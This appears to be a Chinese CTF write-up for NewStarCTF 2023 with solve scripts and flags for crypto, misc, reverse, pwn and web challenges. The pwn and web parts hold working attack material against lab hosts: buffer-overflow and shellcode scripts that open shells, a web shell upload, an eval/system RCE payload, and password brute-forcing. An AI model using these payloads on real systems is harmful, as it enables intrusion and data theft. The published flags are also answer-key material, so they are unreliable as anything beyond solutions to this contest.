Crypto
Caesar’s Secert
flag
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
Fence
flag
flag{reordering_the_plaintext#686f8c03}
brainfuck
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 def shrinkBFCode (code ): cPos2Vars = {} cPos2Change = {} varPos = 0 nCode = [] incVal = 0 lc = None dataChangeOp = set (['+' , '-' ]) dataShiftOp = set (['>' , '<' ]) for i in range (len (code)): c = code[i] if c not in dataChangeOp and lc in dataChangeOp: cPos2Change[len (nCode)] = incVal cPos2Vars[len (nCode)] = varPos nCode.append('+' ) incVal = 0 if c == '>' : varPos += 1 elif c == '<' : varPos -= 1 else : if c in dataChangeOp: incVal += 1 if c == '+' else -1 else : cPos2Vars[len (nCode)] = varPos nCode.append(c) lc = c return '' .join(nCode), cPos2Vars, cPos2Change def generatePyCode (shellCode, pVars, pChange ): pyCodes = [] bStacks = [] whileVarCache = {} for i, c in enumerate (shellCode): d_pos = i if i not in pVars else pVars[i] d_change = 1 if i not in pChange else pChange[i] indentLevel = len (bStacks) indentStr = ' ' *(4 *indentLevel) if c == '[' : pyCodes.append('{}while data[{}] != 0:' .format (indentStr, d_pos)) bStacks.append((c, i)) whileVarCache[i] = {} elif c == ']' : if bStacks[-1 ][0 ] != '[' : raise Exception('miss match of {}] found between {} and {}' .format (bStacks[-1 ][0 ], bStacks[-1 ][1 ], i)) cNum = i-bStacks[-1 ][1 ] if cNum == 2 : del pyCodes[-1 ] del pyCodes[-1 ] d_pos_l = i-1 if i-1 not in pVars else pVars[i-1 ] pyCodes.append('{}data[{}] = 0' .format (' ' *(4 *(indentLevel-1 )), d_pos_l)) whileCode = shellCode[bStacks[-1 ][1 ]+1 : i] if cNum>2 and '[' not in whileCode and not '%' in whileCode: loopCondvar = bStacks[-1 ][1 ] d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar] whileVars = whileVarCache[bStacks[-1 ][1 ]] cVarChange = whileVars[d_pos_l] while len (pyCodes)>0 and pyCodes[-1 ].startswith(indentStr) and pyCodes[-1 ][len (indentStr)]!=' ' : pyCodes.pop() pyCodes.pop() for vPos, vChange in whileVars.items(): if vPos == d_pos_l: continue ctimes = abs (vChange / cVarChange) ctimesStr = '' if ctimes==1 else '{}*' .format (ctimes) cSign = '+' if vChange > 0 else '-' pyCodes.append('{}data[{}] {}= {}data[{}]' .format (' ' *(4 *(indentLevel-1 )), vPos, cSign, ctimesStr, d_pos_l)) pyCodes.append('{}data[{}] = 0' .format (' ' *(4 *(indentLevel-1 )), d_pos_l)) del whileVarCache[bStacks[-1 ][1 ]] bStacks.pop() elif c == '.' : pyCodes.append('{}print(data[{}])' .format (indentStr, d_pos)) elif c == ',' : pyCodes.append('{}data[{}] = ord(stdin.read(1))' .format (indentStr, d_pos)) elif c == '+' : opSign = '-=' if d_change < 0 else '+=' if pyCodes and pyCodes[-1 ] == '{}data[{}] = 0' .format (indentStr, d_pos): pyCodes[-1 ] = '{}data[{}] = {}' .format (indentStr, d_pos, d_change) else : pyCodes.append('{}data[{}] {} {}' .format (indentStr, d_pos, opSign, abs (d_change))) if bStacks: whileVarCache[bStacks[-1 ][1 ]].setdefault(d_pos, 0 ) whileVarCache[bStacks[-1 ][1 ]][d_pos] += d_change elif c == '-' : opSign = '+=' if d_change < 0 else '-=' if pyCodes and pyCodes[-1 ] == '{}data[{}] = 0' .format (indentStr, d_pos): pyCodes[-1 ] = '{}data[{}] = {}' .format (indentStr, d_pos, -d_change) else : pyCodes.append('{}data[{}] {} {}' .format (indentStr, d_pos, opSign, abs (d_change))) if bStacks: whileVarCache[bStacks[-1 ][1 ]].setdefault(d_pos, 0 ) whileVarCache[bStacks[-1 ][1 ]][d_pos] -= d_change elif c == '%' : pyCodes.append('{}data[{}] %= data[{}]' .format (indentStr, d_pos, d_pos+1 )) return '\n' .join(pyCodes) shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++." shrinkCode, pVars, pChange = shrinkBFCode(shellcode) print (generatePyCode(shrinkCode, pVars, pChange))
解密得到
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 data[0 ] += 8 data[2 ] += 2.0 *data[0 ] data[3 ] += 4.0 *data[0 ] data[4 ] += 6.0 *data[0 ] data[5 ] += 8.0 *data[0 ] data[6 ] += 10.0 *data[0 ] data[7 ] += 12.0 *data[0 ] data[8 ] += 14.0 *data[0 ] data[9 ] += 16.0 *data[0 ] data[10 ] += 18.0 *data[0 ] data[11 ] += 20.0 *data[0 ] data[12 ] += 22.0 *data[0 ] data[13 ] += 24.0 *data[0 ] data[14 ] += 26.0 *data[0 ] data[15 ] += 28.0 *data[0 ] data[16 ] += 30.0 *data[0 ] data[0 ] = 0 data[7 ] += 6 print (data[7 ])data[8 ] -= 4 print (data[8 ])data[7 ] -= 5 print (data[7 ])data[8 ] -= 5 print (data[8 ])data[9 ] -= 5 print (data[9 ])data[6 ] -= 1 print (data[6 ])data[8 ] += 2 print (data[8 ])print (data[8 ])print (data[7 ])print (data[8 ])data[8 ] += 6 print (data[8 ])print (data[8 ])print (data[8 ])print (data[8 ])print (data[8 ])data[8 ] -= 6 print (data[8 ])print (data[7 ])print (data[8 ])data[3 ] += 3 print (data[3 ])data[7 ] += 1 print (data[7 ])data[4 ] += 7 print (data[4 ])data[7 ] += 1 print (data[7 ])data[4 ] -= 7 print (data[4 ])data[7 ] -= 1 print (data[7 ])data[4 ] += 1 print (data[4 ])data[4 ] += 7 print (data[4 ])data[4 ] -= 2 print (data[4 ])print (data[4 ])data[8 ] -= 3 print (data[8 ])data[8 ] -= 1 print (data[8 ])data[4 ] -= 1 print (data[4 ])data[4 ] += 3 print (data[4 ])print (data[8 ])data[4 ] -= 7 print (data[4 ])data[4 ] += 1 print (data[4 ])data[9 ] += 2 print (data[9 ])
简单修改一下输出得到
或者CTF在线工具
flag
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Vigenère
Vigenere Solver
flag
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyrsa
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from Crypto.Util.number import *import binasciiimport gmpy2import rsafrom factordb.factordb import FactorDBn = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261 e = 65537 a = FactorDB(n) a.connect() fac = a.get_factor_list() phi_n = 1 for i in fac: phi_n *= (i-1 ) d = gmpy2.invert(e, phi_n) c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595 m = gmpy2.powmod(c, d, n) print (binascii.unhexlify(hex (m)[2 :]))
flag
flag{us4_s1ge_t0_cal_phI}
babyxor
1 2 3 4 5 6 7 8 9 10 11 12 enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2' cipher_hex = [int (enc[i:i+2 ],16 ) for i in range (0 , len (enc), 2 )] for key in range (255 ): flag = '' for c in cipher_hex: flag += chr (c ^ key) if 'flag' in flag: print (f'key={key} \n{flag} ' ) break
flag
flag{x0r_15_symm3try_and_e4zy!!!!!!}
small d
n,e都很大,直接考虑维纳攻击
github上找个脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 import gmpy2import libnumdef continuedFra (x, y ): """计算连分数 :param x: 分子 :param y: 分母 :return: 连分数列表 """ cf = [] while y: cf.append(x // y) x, y = y, x % y return cf def gradualFra (cf ): """计算传入列表最后的渐进分数 :param cf: 连分数列表 :return: 该列表最后的渐近分数 """ numerator = 0 denominator = 1 for x in cf[::-1 ]: numerator, denominator = denominator, x * denominator + numerator return numerator, denominator def solve_pq (a, b, c ): """使用韦达定理解出pq,x^2−(p+q)∗x+pq=0 :param a:x^2的系数 :param b:x的系数 :param c:pq :return:p,q """ par = gmpy2.isqrt(b * b - 4 * a * c) return (-b + par) // (2 * a), (-b - par) // (2 * a) def getGradualFra (cf ): """计算列表所有的渐近分数 :param cf: 连分数列表 :return: 该列表所有的渐近分数 """ gf = [] for i in range (1 , len (cf) + 1 ): gf.append(gradualFra(cf[:i])) return gf def wienerAttack (e, n ): """ :param e: :param n: :return: 私钥d """ cf = continuedFra(e, n) gf = getGradualFra(cf) for d, k in gf: if k == 0 : continue if (e * d - 1 ) % k != 0 : continue phi = (e * d - 1 ) // k p, q = solve_pq(1 , n - phi + 1 , n) if p * q == n: return d n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433 e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825 c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248 d=wienerAttack(e, n) m=pow (c, d, n) print (libnum.n2s(m).decode())
flag
flag{learn_some_continued_fraction_technique#dc16885c}
babyencoding
1 2 3 part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ= part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY= part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
flag
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
Affine
仿射密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 def egcd (a, b ): if a == 0 : return (b, 0 , 1 ) else : g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def modinv (a, m ): g, x, y = egcd(a, m) if g != 1 : raise Exception('modular inverse does not exist' ) else : return x % m modulus = 256 enc = bytes .fromhex( 'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064' ) for key_0 in range (256 ): try : inv_key_0 = modinv(key_0, modulus) except : continue for key_1 in range (256 ): decrypted = bytes ([(inv_key_0 * (c - key_1)) % modulus for c in enc]) if b'flag{' in decrypted: print ("Key found:" , key_0, key_1) print ("Decrypted flag:" , decrypted)
flag
flag{4ff1ne_c1pher_i5_very_3azy}
babyaes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from Crypto.Cipher import AESimport osfrom flag import flagfrom Crypto.Util.number import *def pad (data ): return data + b"" .join([b'\x00' for _ in range (0 , 16 - len (data))]) def main (): flag_ = pad(flag) key = os.urandom(16 ) * 2 iv = os.urandom(16 ) print (bytes_to_long(key) ^ bytes_to_long(iv) ^ 1 ) aes = AES.new(key, AES.MODE_CBC, iv) enc_flag = aes.encrypt(flag_) print (enc_flag) if __name__ == "__main__" : main()
搓个脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from Crypto.Cipher import AESfrom Crypto.Util.number import *a = 3657491768215750635844958060963805125333761387746954618540958489914964573229 enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i' a = a ^ 1 print (long_to_bytes(a))key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,' key = bytes_to_long(key) iv = key ^ a print (long_to_bytes(iv))key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,' iv = b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00' aes = AES.new(key, AES.MODE_CBC, iv) dec_flag = aes.decrypt(enc) print (dec_flag)
flag
flag{firsT_cry_Aes}
Misc
CyberChef’s Secret
flag
flag{Base_15_S0_Easy_^_^}
空白格
whitespace
flag
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}
机密图片
扫码的结果不对,应该有隐写
运用工具StegSolver
flag
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
隐秘的眼睛
SilentEye 直接梭
flag
flag{R0ck1ng_y0u_63b0dc13a591}
流量!鲨鱼!
wireshark打开,大略看一下http,200 OK包很可疑
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
flag
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
修复文件头,修复成功后后缀名改成.zip解压
flag.zip提示损坏
继续修复
或者你如果是高贵的bandizip pro用户
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
应该是提示flag.zip的解压密码是六位数字,密码232311
flag
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
Reverse
easy_RE
flag
flag{welc0me_to_rev3rse!!}
Segments
shift+F7
手动过滤一下,修改格式得到flag
flag
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
咳
upx -d 脱壳
exp
1 2 3 4 5 enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~' flag = '' for i in enc: flag += chr (ord (i) - 1 ) print (flag)
flag
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}
ELF
encode加密完标准base64
先把密文base64解码成hex
exp
1 2 3 4 5 6 7 8 enc = [0x56 , 0x5c , 0x51 , 0x57 , 0x6b , 0x74 , 0x20 , 0x8f , 0x24 , 0x5f , 0x65 , 0x8f , 0x27 , 0x5e , 0x5f , 0x67 , 0x8f , 0x67 , 0x58 , 0x51 , 0x27 , 0x8f , 0x75 , 0x7c , 0x76 , 0x8f , 0x21 , 0x63 , 0x2f , 0x6d ] flag = '' for i in enc: flag += chr (i - 16 ^ 0x20 ) print (flag)
flag
flag{D0_4ou_7now_wha7_ELF_1s?}
AndroXor
jadx打开,循环异或
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 enc = [14 , '\r' , 17 , 23 , 2 , 'K' , 'I' , '7' , ' ' , 30 , 20 , 'I' , '\n' , 2 , '\f' , '>' , '(' , '@' , 11 , '\'' , 'K' , 'Y' , 25 , 'A' , '\r' ] key = 'happyx3' key_ascii = [ord (char) for char in key] flag = "" for i, value in enumerate (enc): key_value = key_ascii[i % len (key_ascii)] if isinstance (value, int ): xor_result = value ^ key_value elif isinstance (value, str ): xor_result = ord (value) ^ key_value flag += chr (xor_result) print (flag)
flag
flag{3z_And0r1d_X0r_x1x1}
Endian
还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
shift+E提取出array
exp
1 2 3 4 5 6 7 8 9 10 11 enc = [ 0x1E , 0x3A , 0x55 , 0x75 , 0x03 , 0x3A , 0x58 , 0x7B , 0x0C , 0x22 , 0x58 , 0x4D , 0x3D , 0x38 , 0x50 , 0x7B , 0x19 , 0x38 , 0x6B , 0x73 , 0x05 ] key = [0x78 ,0x56 ,0x34 ,0x12 ] flag = '' for i, value in enumerate (enc): key_value = key[i % len (key)] flag += chr (value ^ key_value) print (flag)
flag
flag{llittl_Endian_a}
lazy_activity
非预期
正常解法
jadx打开有个flagactivity进程应该是点10000次出flag
打开模拟器app内提示’Where is my flag? Try to start another Activity.’
那就利用模拟器的adb工具
1 2 3 adb shell su am start -n com.droidlearn.activity_travel/.FlagActivity
模拟器弹出这个界面
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本
1 2 3 4 5 6 7 8 9 10 import pyautogui as pdimport timepd.FAILSAFE = True time.sleep(3 ) pd.click(clicks=100000 ,interval=0.0001 )
flag
flag{Act1v1ty_!s_so00oo0o_Impor#an#}
EzPE
打不开,头文件被修改了
随便找个exe文件复制过来fix一下
简单的异或
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 enc = [ 0x0A , 0x0C , 0x04 , 0x1F , 0x26 , 0x6C , 0x43 , 0x2D , 0x3C , 0x0C , 0x54 , 0x4C , 0x24 , 0x25 , 0x11 , 0x06 , 0x05 , 0x3A , 0x7C , 0x51 , 0x38 , 0x1A , 0x03 , 0x0D , 0x01 , 0x36 , 0x1F , 0x12 , 0x26 , 0x04 , 0x68 , 0x5D , 0x3F , 0x2D , 0x37 , 0x2A , 0x7D ] flag = '' l = len (enc)-2 for i in range (l,-1 ,-1 ): enc[i] ^= (i ^ enc[i+1 ]) for i in enc: flag += chr (i) print (flag)
flag
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
PWN
ret2text
栈溢出
exp
1 2 3 4 5 6 7 from pwn import *p=remote("node4.buuoj.cn" ,25617 ) elf = ELF ('./ret2text' ) backdoor = elf.symbols['backdoor' ] payload = b'a' *40 +p64(backdoor) p.sendline(payload) p.interactive()
newstar_shop
看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don’t choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
ezshellcode
有个read
看看buf
直接传’\x90’ 全nop
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from pwn import *banary = "./ezshellcode" elf = ELF(banary) ip = 'node4.buuoj.cn' port = 25641 local = 0 if local: io = process(banary) else : io = remote(ip, port) context(log_level = 'debug' , os = 'linux' , arch = 'amd64' ) sh = shellcraft.sh() payload = b'\x90' *(0x8 +8 ) + asm(sh) io.send(payload) io.interactive()
random
有个随机数,直接调用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from pwn import *banary = "./pwn" elf = ELF(banary) ip = 'node4.buuoj.cn' port = 26831 local = 0 if local: io = process(banary) else : io = remote(ip, port) context(log_level = 'debug' , os = 'linux' , arch = 'amd64' ) clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6" ) clibc.srand(clibc.time(0 )) io.sendlineafter("number?\n" ,str (clibc.rand())) io.interactive()
pieee
PIE保护
看看buf在栈中位置
传完buf 0x28个后直接跳到0x6c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from pwn import *banary = "./pie" elf = ELF(banary) ip = 'node4.buuoj.cn' port = 26955 local = 0 if local: io = process(banary) else : io = remote(ip, port) context(log_level = 'debug' , os = 'linux' , arch = 'amd64' ) payload = b'a' *(0x28 )+b'\x6c' io.send(payload) io.interactive()
web
ErrorFlask
随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
flag
flag{Y0u_@re_3enset1ve_4bout_deb8g}
Begin of HTTP
提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
提示用post 传 secret
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
post 传一下
改一下cookie,改成ctfer
改 User-Agent 为 NewStarCTF2023
改Referer为 newstarctf.com
最后改一下请求头
text 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 POST /?ctf=1 HTTP/1.1 Host: node4.buuoj.cn:28821 Content-Length: 28 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://node4.buuoj.cn:28821 Content-Type: application/x-www-form-urlencoded User-Agent: NewStarCTF2023 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: newstarctf.com Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: power=ctfer Connection: close Client-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 secret=n3wst4rCTF2023g00000d
泄露的秘密
找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt
和index.php
1 PART ONE: flag{r0bots_1s_s0_us3ful
1 2 3 <?php $PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}" ;echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>" ;
flag
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload
前端有文件后缀名检测
直接在包中修改后缀名
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 POST / HTTP/1.1 Host: 56547911 -1 b50-4 aed-a479-45190 dd2be26.node4.buuoj.cn:81 Content-Length: 308 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0 .0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/avif,image/webp,image/apng,*
传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
flag
flag{32ae814a-7562-460c-a936-e6b88ed93f8f}
Begin of PHP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 <?php error_reporting (0 );highlight_file (__FILE__ );if (isset ($_GET ['key1' ]) && isset ($_GET ['key2' ])){ echo "=Level 1=<br>" ; if ($_GET ['key1' ] !== $_GET ['key2' ] && md5 ($_GET ['key1' ]) == md5 ($_GET ['key2' ])){ $flag1 = True; }else { die ("nope,this is level 1" ); } } if ($flag1 ){ echo "=Level 2=<br>" ; if (isset ($_POST ['key3' ])){ if (md5 ($_POST ['key3' ]) === sha1 ($_POST ['key3' ])){ $flag2 = True; } }else { die ("nope,this is level 2" ); } } if ($flag2 ){ echo "=Level 3=<br>" ; if (isset ($_GET ['key4' ])){ if (strcmp ($_GET ['key4' ],file_get_contents ("/flag" )) == 0 ){ $flag3 = True; }else { die ("nope,this is level 3" ); } } } if ($flag3 ){ echo "=Level 4=<br>" ; if (isset ($_GET ['key5' ])){ if (!is_numeric ($_GET ['key5' ]) && $_GET ['key5' ] > 2023 ){ $flag4 = True; }else { die ("nope,this is level 4" ); } } } if ($flag4 ){ echo "=Level 5=<br>" ; extract ($_POST ); foreach ($_POST as $var ){ if (preg_match ("/[a-zA-Z0-9]/" ,$var )){ die ("nope,this is level 5" ); } } if ($flag5 ){ echo file_get_contents ("/flag" ); }else { die ("nope,this is level 5" ); } }
get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
R!C!E!
1 2 3 4 5 6 7 8 9 10 11 <?php highlight_file (__FILE__ );if (isset ($_POST ['password' ])&&isset ($_POST ['e_v.a.l' ])){ $password =md5 ($_POST ['password' ]); $code =$_POST ['e_v.a.l' ]; if (substr ($password ,0 ,6 )==="c4d038" ){ if (!preg_match ("/flag|system|pass|cat|ls/i" ,$code )){ eval ($code ); } } }
爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
EasyLogin
密码应该是个md5
随便注册个用户看看
登录成功后看看源代码可以肯定是md5
是个弱口令
尝试爆破admin
发送到intruder
payload位置选择pwd
payload设置一下,尝试用1400w_rockyou字典 爆破, processing设置成md5
有个8360的不一样,应该就是爆破成功的,把pw复制一下
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
修改完pw后一直点放行,抓到含flag的response包